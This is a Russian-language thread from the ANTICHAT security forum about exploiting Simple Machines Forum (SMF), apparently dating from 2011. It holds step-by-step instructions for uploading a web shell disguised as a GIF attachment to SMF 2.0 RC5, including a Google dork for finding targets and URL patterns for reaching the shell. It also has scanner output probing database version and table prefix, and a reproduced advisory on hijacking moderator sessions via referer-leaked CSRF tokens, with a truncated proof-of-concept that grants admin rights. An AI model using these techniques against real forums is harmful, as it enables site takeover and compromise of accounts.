HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 17.02.2011, 20:52
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию

Цитата:
Сообщение от Flisk  
Flisk said:
Нашел в инете 2 варианта эксплоита под SMF 1.1.11 . Хотелось бы обсудить их.
1.Источник - http://www.thoran.eu/exploit/key/e2f0m/name/Simple_Machines_Forums_SMF_1.1.11.Multiple_Search_ DDOS
2. Источник - http://www.allinfosec.com/2010/06/25/smf-1-1-11-change-password-admin-vulnerabilities/
Хотелось бы узнать такое:
По первому сплоиту - что с ним надо делать? Понимаю, что надо запустить через актив перл, но в самом коде надо что то менять или просто так запускать? Язык перл не знаю.
По второму - окно смены пароля открывается действительно, но когда ввожу новый пароль, пишет "такого пользователя не существует", хотя id=1 точно на форуме есть.
upd. сюда код скопировать почему то не могу - тег CODE переводит все в 1 длинную строку.
1 это походу отправка большого количества запросов, форум их не может фильрировать и падает.... я могу ошибатся

по 2 скажу что этот баг уже профиксили, хотя в сети полно не обновлянных smf
 
Ответить с цитированием

  #52  
Старый 20.04.2011, 01:00
OMG!!
Постоянный
Регистрация: 25.02.2008
Сообщений: 331
Провел на форуме:
1073404

Репутация: 189
По умолчанию

Есть ли возможность узнать имя префикса? какой нибудь ошибкой..

использую SMF
 
Ответить с цитированием

  #53  
Старый 20.04.2011, 18:59
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

А версия бд какая?
 
Ответить с цитированием

  #54  
Старый 20.04.2011, 21:42
OMG!!
Постоянный
Регистрация: 25.02.2008
Сообщений: 331
Провел на форуме:
1073404

Репутация: 189
По умолчанию

Цитата:
Сообщение от Expl0ited  
Expl0ited said:
А версия бд какая?
[~] Testing SMF vulnerability... Yes!

[+] SMF vulnerable!

[~] Testing MySQL version... OK!

[+] MySQL => 4.1

[~] Testing prefix 'smf'... Sorry.

[-] Prefix is not correct.
 
Ответить с цитированием

  #55  
Старый 12.07.2011, 16:01
Avtoritet
Guest
Сообщений: n/a
Провел на форуме:
39202

Репутация: -5
По умолчанию

#SMFRTLO.rb v1.0

#SMF
 
Ответить с цитированием

  #56  
Старый 12.07.2011, 22:50
WTSBugzoff
Guest
Сообщений: n/a
Провел на форуме:
19272

Репутация: 0
По умолчанию

как юзать?
 
Ответить с цитированием

  #57  
Старый 13.07.2011, 12:43
Avtoritet
Guest
Сообщений: n/a
Провел на форуме:
39202

Репутация: -5
По умолчанию

Цитата:
Сообщение от WTSBugzoff  
WTSBugzoff said:
как юзать?
вот и я зотел узнать как юзать! поэтому выложил, а вообще он для подмены имени своего! и дальнейших махинаций соответственно! может кто разберется и просветит нас
 
Ответить с цитированием

  #58  
Старый 25.07.2011, 12:24
ParKrut
Guest
Сообщений: n/a
Провел на форуме:
361

Репутация: 0
По умолчанию

SMF 2.0 RC5 Remote Shell Upload Exploit

Автор: KedAns-Dz

E-mail: ked-h@hotmail.com

Twitter page: twitter.com/kedans

Google дорка: "Powered by SMF 2.0 RC5"


Суть в том, что вы можете загрузить Shell в папку attachments

Зайдите в любую тему, ответьте что-нибудь и прикрепите к ответу Shell картинкой, формата *.gif

После этого залитая картинку будет доступна по адресу:

Код:
Code:
http://[target/Path]/attachments/{fileID}_{fileHASH}
HASH кодер: SHA1

Далее определяем hash (hashmyfiles поможет):

1_86e1d5b5ec318635ec9ece9b4586bd8c1d07faca

После того как определили Hash можно пользоваться Shell' ом

Вариант 1:

Код:
Code:
http://127.0.0.1:8888/smf/attachments/1_86e1d5b5ec318635ec9ece9b4586bd8c1d07faca
Вариант 2:

Код:
Code:
http://[target/Path]/index.php?action=dlattach;topic={topicID};attach={attach-SHELL-id};image
Второй вариант не всегда работает

Дополню, что загружаемый gif, должен быть не больше 128 КБ Это стандартное ограничение

P.S.

Сам не проверял, проверил 3 форума, на них закрыто прикрепление файлов.

Локальный лень поставить

Но думаю, что работает
 
Ответить с цитированием

  #59  
Старый 25.07.2011, 22:22
Melo
Новичок
Регистрация: 14.04.2010
Сообщений: 4
Провел на форуме:
22319

Репутация: 0
По умолчанию

Цитата:
Сообщение от ParKrut  
ParKrut said:
SMF 2.0 RC5 Remote Shell Upload Exploit
Автор: KedAns-Dz

E-mail: ked-h@hotmail.com

Twitter page: twitter.com/kedans

Google дорка: "Powered by SMF 2.0 RC5"

Суть в том, что вы можете загрузить Shell в папку attachments
Зайдите в любую тему, ответьте что-нибудь и прикрепите к ответу Shell картинкой, формата *.gif
После этого залитая картинку будет доступна по адресу:
Код:
Code:
http://[target/Path]/attachments/{fileID}_{fileHASH}
HASH кодер: SHA1
Далее определяем hash (hashmyfiles поможет):
1_86e1d5b5ec318635ec9ece9b4586bd8c1d07faca
После того как определили Hash можно пользоваться Shell' ом
Вариант 1:
Код:
Code:
http://127.0.0.1:8888/smf/attachments/1_86e1d5b5ec318635ec9ece9b4586bd8c1d07faca
Вариант 2:
Код:
Code:
http://[target/Path]/index.php?action=dlattach;topic={topicID};attach={attach-SHELL-id};image
Второй вариант не всегда работает
Дополню, что загружаемый gif, должен быть не больше 128 КБ
Это стандартное ограничение
P.S.
Сам не проверял, проверил 3 форума, на них закрыто прикрепление файлов.
Локальный лень поставить
Но думаю, что работает
Как узнать адрес можна поподробнее
 
Ответить с цитированием

  #60  
Старый 08.08.2011, 12:11
абвгдешка
Guest
Сообщений: n/a
Провел на форуме:
9121

Репутация: 1
По умолчанию

Simple Machines forum (SMF) 2.0 session hijacking

[CODE]
Code:
Simple Machines forum (SMF) 2.0 session hijacking
Found by The X-C3LL and seth
http://0verl0ad.blogspot.com/ || http://xd-blog.com.ar/
2011-08-06
Website: http://www.simplemachines.org/
Greets: yoyahack, eddyw, www.portalhacker.net

SMF stops csrf attacks sending a session token in all the requests wich make changes to the forum.
Usually, it goes in the POST content but when navigating the moderation zone it's present in the url (you need to click the links from inside that zone!). In some places, an attacker can use bbcode to insert a tag, forcing the browser to make a request and leak the token in the referer header.
There are two ways for an attacker to place a image:
-Writing in the moderators chat (?action=moderate), requires being a moderator.
-Making a post and reporting it to the moderator (it will be send to all the section mods and the global mods, who will see it in ?action=moderate;area=reports)

Removing lines 104 and 105 from Subs-Menu.php seems to solve the problem and nothing stops working (!):
/////////////////////////////////////////////////////
if (empty($menuOptions['disable_url_session_check']))
$menu_context['extra_parameters'] .= ';' . $context['session_var'] . '=' . $context['session_id'];
/////////////////////////////////////////////////////

PoC exploit wich gives admin privileges to the regular members:
/////////////////////////////////////////////////////
';
?>



document.forms[0].submit()
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Уязвимость в Simple machines smf 1.0 beta 5 public Nemirof Уязвимости CMS / форумов 0 23.10.2004 00:47
Вопрос про уязвимости в Simple machines forum Уязвимости CMS / форумов 4 27.08.2004 14:09



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ